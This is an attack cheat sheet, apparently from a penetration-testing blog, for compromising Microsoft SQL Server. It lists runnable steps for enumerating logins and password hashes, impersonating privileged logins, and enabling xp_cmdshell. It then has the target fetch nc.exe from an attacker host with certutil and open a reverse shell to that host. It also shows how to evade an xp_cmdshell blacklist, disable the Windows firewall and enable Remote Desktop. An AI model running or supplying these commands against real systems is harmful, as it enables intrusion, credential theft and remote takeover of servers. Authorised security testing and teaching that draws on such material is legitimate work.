Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

Introduction

Microsoft SQL Server (MSSQL) is a relational database management system developed by Microsoft. It is designed to handle a wide range of data processing tasks within corporate environments. MSSQL uses SQL (Structured Query Language) to manage databases and process queries.

MSSQL Enumeration

  1. Login using Windows authentication:
    python3 mssqlclient.py [USERNAME]@[IP-ADDRESS] -windows-auth
  2. Login without Windows authentication:
    python3 mssqlclient.py [DOMAIN]/[USERNAME]@[IP-ADDRESS]

  3. List SQL user accounts and their status: 

    select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;

  4. Show all databases:
    SELECT name FROM master.dbo.sysdatabases

    NOTE

    Default databases include master, tempdb, model, and msdb.

  5. Switch to specific database:
    use [DATABASE-NAME];

  6. Bypass "access denied" error (OPTIONAL):
    ERROR: Line 1: The server principal "MAXIM\hackfast" is not able to access the database "[DATABASE-NAME]" under the current security context.
  7. Find users with impersonation privileges (OPTIONAL):
    SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
  8. Impersonate another login (OPTIONAL):
    EXECUTE AS LOGIN = '[LOGIN-NAME]'
  9. Switch to specific database:
    use [DATABASE-NAME]
  10. List all tables in the database:
    SELECT * FROM [DATABASE-NAME].INFORMATION_SCHEMA.TABLES;
  11. Query a specific table:
    select * from [TABLE-NAME];

Access and Reverse Shell Techniques

  1. Login to MSSQL using Windows authentication:
    python3 mssqlclient.py [USERNAME]@[IP-ADDRESS] -windows-auth
  2. Login to MSSQL without Windows authentication:
    python3 mssqlclient.py [DOMAIN]/[USERNAME]@[IP-ADDRESS]
  3. Check if xp_cmdshell is enabled:
    SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
  4. Enable advanced options to allow setup for xp_cmdshell:
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
  5. Enable xp_cmdshell to allow SQL Server to execute command-line operations:
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
  6. Set up the HTTP server to host nc.exe, create a C:\temp folder on the target, transfer nc.exe, and execute it for a reverse shell:
    xp_cmdshell 'mkdir C:\temp',go
  7. Download nc.exe to the Target Machine:
    xp_cmdshell 'certutil -split -urlcache -f http://[IP-ADRESS]/nc.exe C:\temp\nc.exe',go
  8. Confirm that nc.exe has been placed on the target system:
    xp_cmdshell 'dir C:\temp',go
  9. Execute nc.exe to establish a reverse shell to the attacker's machine:
    xp_cmdshell 'C:\temp\nc.exe [IP-ADRESS] 443 -e cmd.exe' ,go
  10. Bypass blacklisted xp_cmdshell:
    '; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping [IP-ADRESS]' —
  11. Disable the Windows Firewall to reduce defenses against external attacks:
    xp_cmdshell 'netsh firewall set opmode disable';
  12. Modify the registry to enable Remote Desktop, allowing remote access to the system:
    xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f';